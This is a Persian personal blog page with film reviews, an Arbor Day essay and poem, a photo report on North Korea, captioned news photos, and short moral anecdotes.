آرزوی مهیج

تفریح و زندگی

بررسی فیلم های منتخب و جذاب دیدنی


 لطفا تا باز شدن كامل ایمیل شكیبا باشید

  • The King’s Speech 2010

نقد های بسیاری بر این فیلم شده، برخی آن را یک اثر هنری می دانند و برخی آن را یک اثر سطح پایین؛ نظر من روی فیلم متوسط است.

این فیلم موضوع بسیار خوبی دارد، فیلم نامه، کارگردان و بازیگران بسیار عالی کار کرده اند و باعث شده اند نتیجه ی کار فیلمی باشد که یک بار ارزش دیدن را دارد ولی نه دوبار! اینکه کارگردان می خواهد فردی را به تصویر بکشد که سعی می کند بر ناتوانیش غلبه کند بسیار عالیست ولی آیا این ناتوانی در واقعیت به حدی بوده که در موردش در فیلم صحبت شده، آیا افراد دیگری نیستند که صد ها برابر شرایط بدتری دارند و بسیار عالی تر عمل کرده اند. ولی آن ها پادشاه نبوده اند که فیلمشان ساخته شود.

اما بهترین قسمت فیلم، سخنرانی پادشاه بهترین قسمت ندارد همه ی سکانس ها قابل حدس زدن هستند و نکته ی خاصی دیده نمی شود.

 

فکر می کنم بدانید که سخنرانی پادشاه برنده ی جایزه اول بهترین بازیگر مرد سال در اسکار شد ولی اگر من می خواستم به این فیلم جایزه بدهم که نمی دادم به خانم Helena Bonham Carter جایزه می دادم، من همیشه ذهنیتی منفی در فیلم ها برای ایشان قایل می شدم ولی در این فیلم نشان دادند می توانند نقشه یک ملکه ی مهربان را هم به خوبی اجرا کنند.

راستی بد نیست بدانید در انگلستان، پادشاه فقط یک نماد است البته می تواند خیلی کار ها انجام دهد ولی اگر حتی یکی از آن ها اشتباه باشد دیگر نمی تواند قدرتی داشته باشد و کلا نظام پادشاهی سقوط می کند، به همین دلیل پادشاه یا ملکه ترجیح می دهند فقط همان نماد باشند نه بیشتر.

  • You Don’t Know Jack 2010

قبلا دوست عزیزم دکتر مجیدی در مورد این فیلم و موضوع آن پست بسیار زیبایی در اینجا داده اند پس من توضیح بیشتری در موردش نمی دهم.

فیلم فوق العاده ای است، اصلا مگر می شود آل پاچینو در فیلمی باشد و آن فیلم خوب نشود. به نظرم زنده بودن دکتر کورکین هم با آل در بازی هر چه بهترش کمک بسیاری کرده است.


 

جک کورکین و آل پاچینو

 

این فیلم زندگی دکتری را نقل می کند که حداقل 20 سال آینده نگر تر است، دکتری را که تمام حرفش فقط یک جمله است: “”چرا باید کسی که مطمینا در حال مرگ است زجر بیشتری بکشد؟”".

فیلم نامه و همه چیز عالیست و مستقیما تحت تاثیر آل پاچینو، حتی تصورش را نمی شود کرد اگر بوجه فیلم کمی بیشتر بود و بازیگران حرفه ای تری در آن حضور داشتند ما عسل کار چه می شد. بهترین قسمت فیلم، همه ی سکانس های فیلم هستند مخصوصا قسمت هایی که دکتر با بیماران در حال حرف زدن است، مخصوصا زمانی که همسر یک بیمار می گوید:

همسر بیمار: تا وقتی شوهرم زنده بود، من ازش خواهش می کردم به دکتر زنگ نزنه، من هر روز این 9 ماه رو بهش التماس می کردم که این کار رو نکنه، تا اینکه قبل از کریسمس ازش پرسیدم ازم چه هدیه ای می خوای عزیزم؟ و اون آخرین هدیه من بود. اون گفت:”" تنها یک چیز است که می تونی به من بدی عزیزم و اون قرار ملاقات با دکتر کورکین هست”".

  • The Curious Case of Benjamin Button 2008

پیر مرد به دنیا می آید، روز به روز جوان تر می شود تا به خرد سالی و مرگ می رسد. نویسنده دوست داشته روند برعکس زندگی را برای ما به تصویر بکشد.

داستان فیلم بر اساس داستان کوتاهی از فیتزجرالد ساخته شده و با بازی زیبای برد پیت جان گرفته است. نمی توانم بگویم از پایان فیلم راضی هستم چون انتظار خیلی بیشتری داشتم، وقتی فیلم تمام شد باورش برایم سخت بود نمی دانم چرا ولی احساس پوچی در انتهای فیلم از لذت دیدن آن کاست، شاید می شد فیلم را بهتر تمام کرد!

بهترین سکانس و دیالوگ فیلم قسمتی بود که ساعت ساز پرده از ساعتی برداشت که ثانیه شمارش برعکس می چرخید به امید اینکه شاید فرزندانی که در جنگ از دست داده بودند دوباره به زندگی بر می گشتند، کشاورزی می کردند، بچه دار می شدند و از چیزی که لایقش بودند (زندگی) بهرمند.


 

  • A Beautiful Mind

یک شاهکار هنری که بعد از مدت ها وقت دیدنش را یافتم. باید گفت فیلم در ابتدای کار ارتباط زیادی با مخاطب بر قرار نمی کند ولی رفته رفته چنان داستان زیبا می شود که حتی پلک هم نزنید. فیلم از لحاظ بازیگری واقعا خوب است ولی عالی نیست، کارگردانی هم خیلی خوب صورت گرفته ولی آن چه باعث برتری فیلم شده به نظر من، فقط فیلم نامه ی شاهکار آن است. بعد از دیدن فیلم جمله ای که گفتم دقیقا این بود: “”فیلمی که خدا نویسنده اش باشد باید هم عالی باشد”".

بهترین سکانس فیلم هم در آخر آن است زمان گرفتن اسکار، زمانی که جان نش جمله ای را می گوید که به نظرم تاریخیست: “”در تمام طول کار حرفه ایم خیلی کار ها کردم و خیلی چیز ها فهمیدم ولی همه ی آن ها در مقابل مفهومی به نام عشق رنگ می بازند”".

به نظرم این فیلم می تواند معنای خوبی برای کلمه ی عشق باشد، واژه ای که در این سالها معنایش را از دست داده است.

————————————————

  • Red 2010

این هفته فیلم زیبای red با بازی زیباتر بروس ویلیس را دیدم در نگاه اول باید بگویم بروس عزیز ما کمی پیر شده ولی بازیش همچنان خوب و بی نقص است البته جلوه های ویژه هم غوغایی به راه می اندازد که دیگر نمی شود از پای فیلم بلند شد. شاید فیلم از لحاظ موضوع زیاد شاخص نباشد ولی برای عشق اکشن و حادثه می تواند یک فیلم رویایی باشد.

بهترین صحنه ی فیلم صحنه هایی هست که بروس بی احساس قصد دارد عشق خود را به نامزدش نشان دهد البته جان میلکو ویچ (پیرمرد!) هم هر جا که دیده می شود بازی خوبش حس خوشایندی به بیننده القا می کند. حس شوخ طبعی فیلم هم نوید فیلمی را می دهد که ارزش دیدن دارد.

 

————————————————

  • Kill Bill

بیل را بکش تولیدات 2003 و 2004 از فیلم هایی بود که در لیست انتظار 2 ساله ی من قرار داشت و باید بگویم دیدنشان خیلی لذت بخش هم بود. این فیلم با کارگردانی خاص خود قصد دارد حس متفاوت بودن را به بیننده القا کند و باید بگویم موفق هم بوده. به نظرم فیلم های خیلی متفاوت و خوش ساختی بوده اند.

بی هیچ تردیدی بهترین صحنه ی فیلم در قسمت دوم وقتی مادر می فهمد کودکش زنده است، روی می دهد و بدترین صحنه هم زمانیست که پدر باید بمیرد و خودش به سوی مرگ گام بر می دارد.

————————————————

  • Dinner For Schmucks

فیلم از هیچ لحاظی جز روان شناسی به دلم ننشست پس توضیحی در موردش نمی دهم!

————————————————

  • The Other Guys

از لحاظ کمدی واقعا عالیست، بازیگرانش خیلی خوب درخشیده اند و می توان گفت حتما خنده بر لبانتان می نشاند.
بهترین صحنه ی فیلم هم زمانیست که آلن همراه دوستش به خانه می رود و زن آلن را می بینند البته از لحاظ کمدی.
فیلم نامه خیلی خوب نوشته شده و کارگردانی هم خوب است.

————————————————

  • stone 2010

بیشتر به یک فاجعه شبیه است تا یک فیلم. به نظرم مقصود فیلم تبلیغ مذهب است ولی به بدترین شکل ممکن! اصلا نویسنده خودش نمی دانسته می خواهد چه بگوید، چه دینی را تبلیغ کند، به چه روشی فیلم را تمام کند و…
بعد از دیدن فیلم اصلا نمی توانستم باور کنم روبرت دنیرو در این فیلم بازی کرده، شاید لقب بدترین فیلم سال را به این فیلم بدهم!

نویسنده: محمد جواد ׀ تاریخ: سه شنبه 27 اسفند 1389برچسب:بررسی فیلم های منتخب و جذاب دیدنی, ׀ موضوع: <-CategoryName-> ׀

روز درختکاری

 

 
روز درختکاری

گروه اینترنتی پرشین استار | www.Persian-Star.org


درخت، موهبتی است که خداوند آن را برای آسایش و آرامش بشر آفریده و فایده های فراوانی دارد چراکه بسیاری از نیازهای انسان را برآورده می کند. دیدن مناظر زیبای درختان در طبیعت، دل و جان انسان را صیقل داده و آرامش خاصی بر قلب او حاکم می کند. درخت، از آفریده های زیبای خداوندی و یکی از مظاهر عظمت و قدرت پروردگار است که وجودش گواهی بر یگانگی خالق هستی است.

درختان، از پربارترین و زیباترین نعمت های الهی هستند و با توجه به آثار فراوانی که برای زندگی بشر و سایر موجودات زنده دارند، از منابع طبیعی و جزء ثروت های ملی هر کشوری هم به شمار می آیند. در نتیجه، حفاظت و نگهداری از آن ها، وظیفه ای ملّی و همگانی است. افزون بر آن، پاسداری و توسعه این نعمت الهی، شکر و سپاس از خالق یکتاست. در آموزه های حیات بخش ادیان آسمانی، به ویژه دین مبین اسلام، فراوان به این امر توصیه شده است.

امروز، پانزدهم اسفندماه، مثل سالهای قبل و نیمه های اسفند دیگر، روز شاد و به یادماندنی درختکاری است. هر کسی از کوچک و بزرگ می کوشد تا با کاشتن نهالی در دل خاک، نقش در پاکیزگی هوا و سرسبزی مناظر عمومی داشته باشد و با این کار، به پیشواز بهاری دل انگیز و با صفا برود. خورشید نیز با تابش گرم و پر نور خود، دست های مهربان شما مردم عزیز را همراهی می کند و درختانِ شاد و خوشحال، نظاره گر تلاش شما هستند. امروز، جشن دوستی انسان ها با طبیعت زیبا و با طراوت خداوند است.

:: ساختمان حیرت انگیز درختان

درختان و گیاهان، در عین سادگی ظاهری، ساختمان درونی پیچیده ای دارند که می توان با مطالعه آن ها، به بزرگی آفریننده شان پی برد. یکی از گیاه شناسان در این باره می گوید: "خدایی وجود دارد که از خلال قوانین ثابت و مرموزی که جهان گیاه و درخت را اداره می کند، از چند راه ظاهر می شود:

1. نظم و ترتیبی که رشد، تقسیمات سلولی و تشکیل اجزای مختلف درخت را به طور منظم انجام می دهد.
2. هیچ ماشین دست ساز بشری، قابل مقایسه با ساختمان پیچیده یک درخت نیست.
3. زیبایی ساقه و برگ و گل.
4. توراث، به طوری که هر درختی، نظیر خود را تولید می کند.
این دانشمند می افزاید: "به عقیده من، این همه مظاهر، دلیل وجود آفریدگاری است که حکمت بالغه و قدرت نامتناهی دارد.

نهالی که در زمین کاشته می شود، پس از مدتی، به درخت تنومندی تبدیل خواهد شد که می توان از سایه و میوه و سایر فواید آن بهره برد. عده ای، درخت را تنها برای استفاده خود می کارند و اگر خود از آن بهره ای نبرند، اقدام به کاشت نهال نخواهند کرد. در حالی که در درخت کاری، افزون بر نفع شخصی، استفاده همگانی و پاداش اخروی آن را نیز باید در نظر گرفت. نقل شده است که پیرمردی نهال گردو می کاشت، به او گفتند: عمر تو به چیدن میوه این درخت کفاف نخواهد داد. او جواب داد: دیگران کاشتند، ما خوردیم؛ حال ما می کاریم، دیگران بخورند.

روز درختکاری هم روزی دیگر از روزهای سال است که در آن مردم با قائل شدن اهمیت بیشتری به درخت و فضای سبز تشویق به کاشتن نهال می‌شوند. این روز در کشورهای مختلفی گرامی داشته می‌شود. این روز معمولا در روزهای پایانی زمستان یا روزهای نخست بهار است. این روز برای نخستین بار توسط جولیوس استرلینگ مورتون از ایالت نبراسکا در ۱۰ آوریل ۱۸۷۲ پایه گذاشته شد. در ایالات متحده بعدها این روز (Arbor Day)، به چهارمین جمعه آوریل، منتقل شد.

گروه اینترنتی پرشین استار | www.Persian-Star.org


:: روز درختکاری در کشورهای مختلف جهان


در ایران این روز در ۱۵ اسفند برابر با 6 مارس هر سال و هفته منابع طبیعی از 15 الی 21 اسفند است، در آفریقای جنوبی هفته درختکاری از ۱ تا ۷ سپتامبر هر سال است. در الجزایر روز درختکاری برابر با ۲۷ اکتبر، در استرالیا برابر با ۲۸ ژولای، در بلژیک برابر با ۲۱ مارس، در برزیل برابر با ۲۱ سپتامبر، در کامبوج برابر با ۱ ژوئن، در جمهوری آفریقای مرکزی برابر با ۲۲ جولای، در تایوان برابر با ۱۲ مارس، در چین برابر با ۱۲ مارس، در کاستاریکا برابر با ۱۵ ژوئن، در مصر برابر با ۱۵ ژانویه، در آلمان برابر با ۲۵ آوریل، در ژاپن برابر با ۲۹ آوریل، در کنیا برابر با ۲۱ آوریل، در لسوتو برابر با ۲۱ مارس، در مقدونیه برابر با ۱۲ مارس، در مالاوی برابر با دومین دوشنبه ماه دسامبر، در مکزیک برابر با دومین دوشنبه ماه جولای، در نامبیا برابر با ۸ اکتبر، در هلند برابر با نخستین روز بهار (۲۱ مارس) یا نخستین روز پاییز (۲۱ سپتامبر)، در نیوزیلند برابر با ۵ ژوئن، در نیجر برابر با ۳ آگوست، در فیلیپین برابر با ۲۵ ژوئن، در لهستان برابر با ۱۰ اکتبر، در اسرائیل برابر با پنجمین روز ماه شِوَت (ژانویه-فوریه)، در پرتغال برابر با نخستین روز بهار (۲۱ مارس)، در کره جنوبی برابر با ۵ آوریل، در سریلانکا برابر با ۱۵ اکتبر، در تانزانیا برابر با ۱ ژانویه، در اوگاندا برابر با ۲۴ مارس، در ایالات متحده امریکا برابر با ۱۰ آوریل، در ونزوئلا برابر با چهارمین یکشنبه ماه می هر سال است.

گروه اینترنتی پرشین استار | www.Persian-Star.org

درخت

تو قامت بلند تمنایی ای درخت

همواره خفته است

در آغوشت آسمان

بالایی ای درخت !

دستت پر از ستاره و جانت پر از بهار

زیبایی ای درخت !

وقتی كه بادها

در برگ های درهم تو لانه می كنند

وقتی كه بادها

گیسوی سبزفام تو را شانه می كنند

غوغایی ای درخت !

وقتی كه چنگ وحشی باران گشوده است

در بزم سرد او

خنیاگرغمین خوش آوایی ای درخت !

در زیر پای تو، اینجا شب است و شب زدگانی كه چشمشان، صبحی ندیده است

تو، روز را كجا ؟!

خورشید را كجا ؟!

در دشت دیده غرق تماشایی ای درخت !

چون با هزار رشته تو با جان خاكیان، پیوند می كنی

پروا مكن ز رعد !

پروا مكن ز برق، كه بر جایی ای درخت !

سر بر كش ای رمیده كه

همچون امید ما

با مایی و یگانه و تنهایی ای درخت !


شعر از : سیاوش كسرایی


بیا تا نهال کوچک سبز را در این روز به خاک سرد، اما پر امید اسفند بسپاریم، تا آفتاب عالمتاب گرمای خویش را هدیه راه طولانی اش کند و آب زلال پاکش را بدرقه شکفتن اش نماید. زمینِ سبز، دوست داشتنی و خیال انگیز است. چشم را نوازش می دهد و زبان را به تسبیح وا می دارد. ما با هم در روز درختکاری قراری سبز می گذاریم و همدیگر را به کاشت و حفظ این موجود زیبای خداوندی سفارش می کنیم. این قامت بلند و باشکوه، طلای سبزی است که زیستن، شکوفایی، ایستادگی، حرکت و پویایی را به ما می فهماند. خداوند این موجود سبز و بابرکت را مایه عبرت، حکمت و قدرت خویش قرار داده است.


گروه اینترنتی پرشین استار | www.Persian-Star.org

نویسنده: محمد جواد ׀ تاریخ: سه شنبه 23 اسفند 1389برچسب:روز درختکاری, ׀ موضوع: <-CategoryName-> ׀

عکس های کمیاب از کره ی شمالی

عکس های کمیاب از کره ی شمالی

  

 

 

 

  چندی پیش Artemy Lebedev، از فعالان طراحی وب ، سفری به کره شمالی داشت. او عکس‌های بسیار جالبی در جریان سفرش به این کشور عجیب و غریب گرفته است؛ کشوری که حقیقتا از آن اطلاعات بسیار کمی در دسترس ذهن‌های کنجکاو است… 





به محض رسیدن به فرودگاه بایستی تلفن همراه‌تان را تحویل دهید، هیچ سرویس رومینگی در دسترس نیست. هیچ شخصی با تلفن همراه دیده نمی‌شود. اما استفاده از لپ‌تاپ اشکالی ندارد، به نظر می‌رسد که کره شمالی‌ها از کارت‌هایی باخبر نیستند که توانایی تبدیل لپ‌تاپ به تلفن همراه را دارد. 
خبری از اینترنت نیست، تنها اینترانت وجود دارد.
 

 



وقتی که به کره شمالی وارد می‌شوید به شما یک راهنما و یک راننده اختصاص می‌دهند و همیشه همراه‌تان هستند. شما نمی‌توانید خودتان هتل را ترک کنید. برنامه روزانه شامل ۲ تا ۳ بازدید تفریحی می‌شود. در هتل می‌توانید BBC، چندین شبکه از چین و همچنین شبکه NTV روسیه را مشاهده کنید. 

 



نفت تقریبا وجود ندارد بنابراین بیشتر کارها دستی انجام می‌شود. 

 

 



در شهر روشنایی‌ها ساعت ۱۱ خاموش می‌شوند. شهر در شب ترسناک است. خبری از روشنایی در خیابان‌ها نیست. 

 



در طول روز آسانسور برای ۱۵ دقیقه کار نمی‌کند. 

 



تمام «پیونگ‌یانگ» به این شکل است. از راهنما درباره خانه‌های قدیمی پرسیدم، او گفت، پیرها دوست ندارند که به خانه‌های جدید بروند، زندگی در این خانه‌ها را می‌پسندند. 

 



در ساحل کره شمالی، سیم خاردارهای برق‌دار شده وجود دارند تا از این طریق شهروندان کره شمالی فکر شنا کردن به سرشان نزند. و البته شما اجازه عکس گرفتن هم ندارید. 

 

 



در حدود ۱۰ درصد از جمعیت در ارتش خدمت می کنند. عبور از سربازان غیرممکن است. 

 



در نزدیکی مرز دو کره، جاده برای مقابله با هجوم دشمن آماده است. مکعب‌های بزرگ برای این است که با افتادن به جاده، تانک‌های دشمن را به تله بیاندازند. 

 



تنها تبلیغات در کره شمالی، تبلیغاتی برای یک ماشین است (ساخته شده با همکاری کره جنوبی) که آن را تنها در پایتخت خواهید دید. 

 



هر شهروند در کره شمالی، نشانی از «کیم ایل سونگ» بر سینه‌ی خود دارد؛ به جز کودکان و خدمتکاران که احتمالا این نشان به دلیل پوشیدن لباس کار مخفی شده است. 
شما نمی‌توانید این نشان را خریداری کنید.
 

 



همانطور که گفته شد، شما نمی‌توانید آزادانه در کره شمالی حرکت کنید. همه جا ایست بازرسی وجود دارد. وقتی که ماشین از ایست بازرسی عبور می‌کند، راننده چراغ می‌زند. احتمالا به این معنا است که فردی خارجی در حال عبور است. 

 



ورودی مترو فرسوده به نظر می‌رسد. 

 



نوشته‌ایی وجود دارد که معنایش می شود: «کیم جونگ ایل» – خورشید قرن ۲۱ ام! 

 



ترن‌ها از ۴ واگن ساخته شده‌اند. درب‌ها با دست باز شده و خودکار بسته می‌شوند. 

 



ویژگی شهرها، نبود ماشین است. همه پیاده مسیر را طی می‌کنند، گاهی اوقات از تراموا و اتوبوس‌ها استفاده می‌کنند. دوچرخه نایاب و گران‌قیمت است. 

 


 



روند ساخت هتلی نیز از ۱۹۹۱ متوقف شده است. توصیه شد که از نزدیک عکسی گرفته نشود، البته… 

 



البته اشکالی ندارد که از فاصله‌ی دور این کار را انجام دهیم! 

 



کره‌ای‌ها عادت دارند در هنگام راه رفتن، دست‌هایشان را در پشت محکم کنند. به ندرت مردان لباس‌های روشن می‌پوشند. 

 



تمام خارجی‌ها را به تماشای پارک اصلی می‌برند. محلی‌ها اجازه ورود ندارند! 
 

 

نویسنده: محمد جواد ׀ تاریخ: سه شنبه 20 اسفند 1389برچسب:عکس های کمیاب از کره ی شمالی, ׀ موضوع: <-CategoryName-> ׀

سوژه های جالب از شکار لحظه ها

سوژه های جالب از شکار لحظه ها 

  

  























ادامه مطلب
نویسنده: محمد جواد ׀ تاریخ: سه شنبه 19 اسفند 1389برچسب:سوژه های جالب از شکار لحظه ها , ׀ موضوع: <-CategoryName-> ׀

دیدنی های روز

دیدنی های روز

  

   
تمرين تئاتري در لندن


تمرين تئاتري در لندن




آتش زدن خانه يك فلسطيني از سوي شهرك نشينان تندرو اسراييلي در نزديكي نابلس. دو كودك ساكن دراين خانه بر اثر سوختگي راهي بيمارستان شدند


آتش زدن خانه يك فلسطيني




مزار يكي از كشته شدگان تظاهرات ضد دولتي در بحرين


مزار کشته شده بحرینی




يك هواپيماي مسافربري بر فراز لندن


هواپيماي مسافربري




يك خوك ماده وسط جاده اي در آلباني در حال شير دادن به بچه هايش


خوك




ايجاد يك تونل يخي بسيار زيبا در اثر حركات كوه هاي يخي عظيم در آلاسكا


تونل يخي


تونل يخي




واكنش جالب رييس جمهوري فيليپين به هنگام آزاد كردن يك پرنده به مناسبت گرامي داشت بيست و پنجمين سالگرد انقلاب فيليپين در شهر مانيل


سالگرد انقلاب فيليپين




كار يك جوان چيني با لب تاپ خود در درون اتاقك يك هتل كپسولي در شانگهاي چين . مقامات چيني مي گويند كه اتاق هاي اين هتل كپسولي استاندارد نيست و بايد تعطيل شود


هتل كپسولي




قطار سواري به سبك هندي


قطار سواري به سبك هندي




فيگوري جالب از پوتين در جريان كنفرانس خبري مشترك با رييس كميسيون اروپا در بروكسل


پوتين




بدون شرح!


بدون شرح


بدون شرح
نویسنده: محمد جواد ׀ تاریخ: سه شنبه 19 اسفند 1389برچسب:دیدنی های روز, ׀ موضوع: <-CategoryName-> ׀

سرانجام سبقت گرفتن از فیل !!!

 سرانجام سبقت گرفتن از فیل !!!

  

  

این سانحه که در آفریقای جنوبی رخ داده نتیجه سبقت گرفتن یک راننده ایرلندی از فیلی بوده که مشغول پیاده روی در جاده بوده است. مراقب باشید اگه گذرتون به جنگل های افریقا افتاد به محدوده قلمرو حیوانات توجه داشته باشید چون ظاهرا اونجا حق تقدم با اونهاست. البته فیل ها یه کم از بقیه حیوونا مهربونتر بنظر می رسن و میشه تا مسافتی اونها رو اسکورت کرد ولی تا زمانی که لجشون در نیاد ...

 

 

 

 

 

 

 

 

 

نویسنده: محمد جواد ׀ تاریخ: سه شنبه 18 اسفند 1389برچسب: سرانجام سبقت گرفتن از فیل !!!, ׀ موضوع: <-CategoryName-> ׀

طراحی مناظر زیبای برفی با مداد

طراحی مناظر زیبای برفی با مداد

  

  


























































نویسنده: محمد جواد ׀ تاریخ: سه شنبه 17 اسفند 1389برچسب:طراحی مناظر زیبای برفی با مداد, ׀ موضوع: <-CategoryName-> ׀

مقایسه تصاویری از امروز با خاطراتی از گذشته

 
مقایسه تصاویری از امروز با خاطراتی از گذشته


 لطفا تا باز شدن كامل عكسها شكیبا باشید
در صورتی که هر یک از عکس ها باز نشد بر روی آن راست کلیک کرده و گزینه Show Picture را انتخاب كنید

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


ادامه مطلب
نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 5 اسفند 1389برچسب:مقایسه تصاویری از امروز با خاطراتی از گذشته, ׀ موضوع: <-CategoryName-> ׀

مطالب جالب و آموزنده


مطالب جالب و آموزنده
در قالب داستان های کوتاه و خواندنی


گروه اینترنتی پرشین استار | www.Persian-Star.org

کدام مستحق تریم ؟


شب سردی بود … پیرزن بیرون میوه فروشی زل زده بود به مردمی که میوه میخریدند. شاگرد میوه فروش تند تند پاکت های میوه رو توی ماشین مشتری ها میذاشت و انعام میگرفت.

پیرزن با خودش فکر میکرد چی میشد اونم میتونست میوه بخره ببره خونه … رفت نزدیک تر، چشمش افتاد به جعبه چوبی بیرون مغازه که میوه های خراب و گندیده داخلش بود … با خودش گفت چه خوبه سالم ترهاشو ببره خونه. میتونست قسمت های خراب میوه ها رو جدا کنه و بقیه رو بده به بچه هاش، هم اسراف نمیشد هم بچه هاش شاد میشدن …

برق خوشحالی توی چشماش دوید.. دیگه سردش نبود ! پیرزن رفت جلو نشست پای جعبه میوه؛ تا دستش رو برد داخل جعبه، شاگرد میوه فروش گفت : دست نزن نِنه ! وَخه برو دُنبال کارت ! پیرزن زود بلند شد … خجالت کشید ! چند تا از مشتریها نگاهش کردند ! صورتش رو قرص گرفت … دوباره سردش شد ! راهش رو کشید رفت …

چند قدم دور شده بود که یه خانمی صداش زد : مادر جان … مادر جان ! پیرزن ایستاد، برگشت و به زن نگاه کرد ! زن مانتویی لبخندی زد و بهش گفت اینارو برای شما گرفتم ! سه تا پلاستیک دستش بود پر از میوه … موز و پرتغال و انار …

پیرزن گفت : دستِت دَرد نِکُنه نِنه... مُو مُستَحق نیستُم !

زن گفت : اما من مستحقم مادر من … مستحق داشتن شعور انسان بودن و به هم نوع توجه کردن … اگه اینارو نگیری دلمو شکستی ! جون بچه هات بگیر !
زن منتظر جواب پیرزن نموند … میوه هارو داد دست پیرزن و سریع دور شد …

پیرزن هنوز ایستاده بود و رفتن زن رو نگاه میکرد … قطره اشکی که تو چشمش جمع شده بود غلتید روی صورتش … دوباره گرمش شده بود … با صدای لرزانی گفت :
پیر شی ننه ... پیر شی ! خیر بیبینی این شب چله مادر


گروه اینترنتی پرشین استار | www.Persian-Star.org


فرق احمق و دیوانه


اتومبیل مردی در هنگام رانندگی، درست جلوی حیاط یک تیمارستان پنچر شد و راننده مجبور شد همانجا به تعویض لاستیک آن بپردازد.

هنگامی که آن مرد سرگرم این کار بود، ماشین دیگری به سرعت از روی مهره‌های چرخ که در کنار ماشین بودند گذشت و آنها را به درون جوی آب انداخت و آب مهره‌ها را برد. مرد حیران مانده بود که چکار کند. او تصمیم گرفت که ماشینش را همانجا رها کند و برای خرید مهره چرخ برود. در این حین، یکی از دیوانه‌ها که از پشت نرده‌های حیاط تیمارستان، نظاره‌گر این ماجرا بود، او را صدا زد و گفت:

از 3 چرخ دیگر ماشین، از هر کدام یک مهره بازکن و این لاستیک را با 3 مهره ببند و برو تا به تعمیرگاه برسی!

آن مرد اول توجهی به این حرف نکرد، ولی بعد که با خودش فکر کرد، دید راست می گوید و بهتر است همین کار را بکند. پس به راهنمایی او عمل کرد و لاستیک زاپاس را بست. هنگامی که خواست حرکت کند رو به آن دیوانه کرد و گفت: "خیلی فکر جالب و هوشمندانه‌ای داشتی، پس چرا تو را توی تیمارستان انداختنت؟"

دیوانه لبخندی زد و گفت: من اینجام چون دیوانه‌ام، ولی احمق که نیستم!


گروه اینترنتی پرشین استار | www.Persian-Star.org


دو کوزه


در افسانه ای هندی آمده است که مردی هر روز دو کوزه بزرگ آب به دو انتهای چوبی می بست، چوب را روی شانه اش می گذاشت و برای خانه اش آب می برد.
یکی از کوزه ها کهنه تر بود و ترک های کوچکی داشت. هر بار که مرد مسیر خانه اش را می پیمود نصف آب کوزه می ریخت.
مرد دو سال تمام همین کار را می کرد. کوزه سالم و نو مغرور بود که وظیفه ای را که به خاطر انجام آن خلق شده به طور کامل انجام می دهد. اما کوزه کهنه و ترک خورده شرمنده بود که فقط می تواند نصف وظیفه اش را انجام دهد.

هر چند می دانست آن ترک ها حاصل سال ها کار است.
کوزه پیر آنقدر شرمنده بود که یک روز وقتی مرد آماده می شد تا از چاه آب بکشد تصمیم گرفت با او حرف بزند: "از تو معذرت می خواهم.
تمام مدتی که از من استفاده کرده ای فقط از نصف حجم من سود برده ای و فقط نصف تشنگی کسانی را که در خانه ات منتظرند فرو نشانده ای"
مرد خندید و گفت: "وقتی برمی گردیم با دقت به مسیر نگاه کن" موقع برگشت کوزه متوجه شد که در یک سمت جاده در سمت خودش، گل ها و گیاهان زیبایی روییده اند.
مرد گفت: "می بینی که طبیعت در سمت تو چقدر زیباتر است؟ من همیشه می دانستم که تو ترک داری و تصمیم گرفتم از این موضوع استفاده کنم.
این طرف جاده بذر سبزیجات و گل پخش کردم و تو هم همیشه و هر روز به آنها آب می دادی.
به خانه ام گل برده ام و به بچه هایم کلم و کاهو داده ام. اگر تو ترک نداشتی چطور می توانستی این کار را انجام دهی ؟!"


گروه اینترنتی پرشین استار | www.Persian-Star.org


صداقت کودکانه


یک روز یک دختر کوچک در آشپزخانه نشسته بود و به مادرش که داشت آشپزى مى‌کرد نگاه مى‌کرد.
ناگهان متوجه چند تار موى سفید در بین موهاى مادرش شد.
از مادرش پرسید: مامان! چرا بعضى از موهاى شما سفیده؟
مادرش گفت: هر وقت تو یک کار بد مى‌کنى و باعث ناراحتى من مى‌شوی، یکى از موهایم سفید مى‌شود.
دختر کوچولو کمى فکر کرد و گفت: حالا فهمیدم چرا همه موهاى مامان بزرگ سفید شده!


گروه اینترنتی پرشین استار | www.Persian-Star.org


راهزنان


شبی راهزنان به قافله‌ای شبیخون زدند و اموال ‌آنان را به غارت بردند، بعد از مراجعت به مخفیگاه نوبت به تقسیم اموال مسروقه رسید، همه جمع شدند و هرکس آنچه به دست آورده بود به میان گذاشت، رئیس دزدان از جمع پرسید چگونه تقسیم کنیم ؟ خدایی یا رفاقتی ؟ جمع به اتفاق پاسخ دادند خدایی.

رئیس دزدان شروع به تقسیم کرد، بیش از نیمی از اموال را برای خود برداشت و الباقی را به شکل نامساوی میان سه تن از راهزنان تقسیم کرد و به بقیه هیچ نداد، دیگران اعتراض کردند که ما گفتیم خدایی تقسیم کن تا تساوی رعایت شود و همه راضی باشیم این چه تقسیمیست ؟؟؟
رئیس پاسخ داد : خداوند به یکی زیاد بخشیده و به یکی کمتر و به یکی هم هیچ، خود شاهدی بر این ادعا هستید، آن تقسیمی که شما در نظر دارید تقسیم رفاقتی بود که نپذیرفتید پس حق اعتراض ندارید …


گروه اینترنتی پرشین استار | www.Persian-Star.org


مفهوم عدالت


میگن در زمانهای قدیم یه روز سه تا پسر بچه میرن پیش ملانصرالدین میگن ما ده تا گردو داریم میشه اینها رو با عدالت بین ما تقسیم کنی؟
ملا میگه با عدالت آسمونی یا عدالت زمینی؟
بچه ها میگن خوب عدالت آسمونی بهتره با عدالت آسمونی تقسیم کن.
ملا هشت تا گردو میده به اولی دو تا میده به دومی و دو تا پس گردنی محکم هم می زنه به سومی !
بچه ها شاکی میشن میگن این چه عدالتیه ملا؟
ملا میگه خدا هم نعمتاشو بین بنده هاش همینجوری تقسیم کرده !


گروه اینترنتی پرشین استار | www.Persian-Star.org


دوستِ من ـ حسن


